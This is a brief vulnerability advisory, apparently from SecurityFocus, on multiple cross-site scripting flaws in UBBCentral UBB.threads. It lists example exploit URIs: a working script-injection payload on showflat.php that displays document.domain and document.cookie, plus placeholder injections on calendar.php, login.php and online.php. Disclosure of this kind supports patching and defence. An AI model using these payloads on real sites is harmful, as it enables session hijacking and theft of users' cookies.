UBBCentral UBB.threads Multiple Cross-Site Scripting Vulnerabilities

Example URIs sufficient to exploit these vulnerabilities have been provided:

http://www.example.com/showflat.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C/SCRIPT%3E%0D%0A"));
http://www.example.com/calendar.php?Cat=[XSS]
http://www.example.com/login.php?Cat=[XSS]
http://www.example.com/online.php?Cat=[XSS]


 

Privacy Statement
Copyright 2010, SecurityFocus